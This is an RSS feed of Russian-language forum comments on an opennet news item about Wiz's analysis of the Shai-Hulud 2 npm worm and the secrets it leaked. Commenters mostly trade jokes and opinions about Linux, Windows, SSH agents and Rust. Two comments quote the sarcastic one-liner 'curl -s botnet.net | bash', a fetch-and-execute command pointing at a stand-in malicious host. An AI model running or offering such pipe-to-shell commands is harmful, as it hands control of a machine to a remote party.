<?xml version="1.0" encoding="koi8-r"?>
<rss version="0.91">
<channel>
    <title>OpenForum RSS: Анализ конфиденциальных данных, захваченных червём Shai-Hulud 2</title>
    <link>https://www.opennet.me/openforum/vsluhforumID3/138568.html</link>
    <description>Компания Wiz опубликовала результаты анализа следов деятельности червя Shai-Hulud 2, в ходе активности которого в репозитории NPM были опубликованы вредоносные выпуски более 800 пакетов, насчитывающих в сумме более 100 млн загрузок. После установки поражённого пакета, активизировавшийся червь выполняет поиск конфиденциальных данных, публикует новые вредоносные релизы (при обнаружении токена подключения к каталогу NPM) и размещает в открытом доступе найденные в системе конфиденциальные данные через создание новых репозиториев в GitHub...&lt;br&gt;&lt;br&gt;Подробнее: https://www.opennet.ru/opennews/art.shtml?num=64377&lt;br&gt;</description>

<item>
    <title>Анализ конфиденциальных данных, захваченных червём Shai-Hulu... (Big Robert TheTables)</title>
    <link>https://www.opennet.me/openforum/vsluhforumID3/138568.html#89</link>
    <pubDate>Fri, 12 Dec 2025 08:21:05 GMT</pubDate>
    <description>да не был ты свидетелем атаки через vim, это мошенники тебя развели&lt;br&gt;</description>
</item>

<item>
    <title>Анализ конфиденциальных данных, захваченных червём Shai-Hulu... (1)</title>
    <link>https://www.opennet.me/openforum/vsluhforumID3/138568.html#87</link>
    <pubDate>Mon, 08 Dec 2025 06:43:07 GMT</pubDate>
    <description>&amp;gt; обычные получат этого червя через curl&amp;#124;sudo su&lt;br&gt;&lt;br&gt;Ну или через dnf install&lt;br&gt;</description>
</item>

<item>
    <title>Анализ конфиденциальных данных, захваченных червём Shai-Hulu... (нах.)</title>
    <link>https://www.opennet.me/openforum/vsluhforumID3/138568.html#86</link>
    <pubDate>Sun, 07 Dec 2025 20:11:30 GMT</pubDate>
    <description>&amp;gt; curl -s botnet.net &amp;#124; bash &lt;br&gt;&lt;br&gt;там топикстартер (не слишком умный) выдал &quot;не использовать линукс&quot; (чтоб такого вот не было). Я ему показал что совершенно аналогичный подход в венде тоже уже стал абсолютно  обычным явлением, не то что юзверьки, а и админы локалхостов ни на секунду не задумываются прежде чем такое вот выполнять (и на промпт uac ответят ок неглядя)&lt;br&gt;&lt;br&gt;&lt;br&gt;</description>
</item>

<item>
    <title>Анализ конфиденциальных данных, захваченных червём Shai-Hulu... (Аноним)</title>
    <link>https://www.opennet.me/openforum/vsluhforumID3/138568.html#80</link>
    <pubDate>Sun, 07 Dec 2025 11:23:54 GMT</pubDate>
    <description>И кстати, о встраивании кода слежки продуктами для разработчиков от M$ всем широко известно. Вам это как-то помогло? Вы по-прежнему ими пользуетесь и предоставляете им доступ Сеть со своих корпоративных машин.&lt;br&gt;</description>
</item>

<item>
    <title>Анализ конфиденциальных данных, захваченных червём Shai-Hulu... (Аноним)</title>
    <link>https://www.opennet.me/openforum/vsluhforumID3/138568.html#79</link>
    <pubDate>Sun, 07 Dec 2025 11:18:58 GMT</pubDate>
    <description>Публичное поле - это лишь вершина айсберга информации об известных уязвимостях в ПО.&lt;br&gt;</description>
</item>

<item>
    <title>Анализ конфиденциальных данных, захваченных червём Shai-Hulu... (Аноним)</title>
    <link>https://www.opennet.me/openforum/vsluhforumID3/138568.html#78</link>
    <pubDate>Sun, 07 Dec 2025 11:15:38 GMT</pubDate>
    <description>Полагаю, речь не о прямом доступе к памяти, а об SSH-агентах (ssh-add).&lt;br&gt;</description>
</item>

<item>
    <title>Анализ конфиденциальных данных, захваченных червём Shai-Hulu... (21yosenior)</title>
    <link>https://www.opennet.me/openforum/vsluhforumID3/138568.html#77</link>
    <pubDate>Sun, 07 Dec 2025 10:27:32 GMT</pubDate>
    <description>Неверно.&lt;br&gt;&lt;br&gt;Коекакерский подход особых проблем не вносит, а если бы вносил - не существовало бы ни одной скриптухи, коей являются все языки за исключением одного. И даже этот один язык не существовал бы в текущем виде, а был бы на порядки менее коекакерским. То же относится и к остальным вещам - ядро, всякая системная херота, вэбчик, хттп(и в целом текст), маздайка, множество &quot;людей&quot;, как например тутошние комментаторы и писатели новостей. Шланг ака &quot;топ компилятор сишки&quot;. Коекакерство это то, что позволяет существовать всему этому. Нельзя локально уйти от чего-то, что является свойством глобальным. Разве что в каких-то сильно примитивных случаях можно изолированный загончик создать. Но ценность этого околонулевая.&lt;br&gt;&lt;br&gt;А вот настоящая проблема раста это продвижение госухой/админ-ресурсом и полная несостоятельность(потому как всё ворованное, даже компилятор и модели памяти/исполнения). Хотя в жаве что-то отдалённо напоминающее также было(&quot;убийца сишки&quot;, &quot;быстрее сишки&quot;), но там всё было слишком очевидно. Да и в</description>
</item>

<item>
    <title>Анализ конфиденциальных данных, захваченных червём Shai-Hulu... (Аноно)</title>
    <link>https://www.opennet.me/openforum/vsluhforumID3/138568.html#75</link>
    <pubDate>Sat, 06 Dec 2025 14:30:39 GMT</pubDate>
    <description>Интересно, сколько среди этих линуксоидов вендузятники с WSL? :)&lt;br&gt;</description>
</item>

<item>
    <title>Анализ конфиденциальных данных, захваченных червём Shai-Hulu... (Аноним)</title>
    <link>https://www.opennet.me/openforum/vsluhforumID3/138568.html#74</link>
    <pubDate>Sat, 06 Dec 2025 13:34:30 GMT</pubDate>
    <description>curl -s botnet.net &amp;#124; bash&lt;br&gt;</description>
</item>

</channel>
</rss>
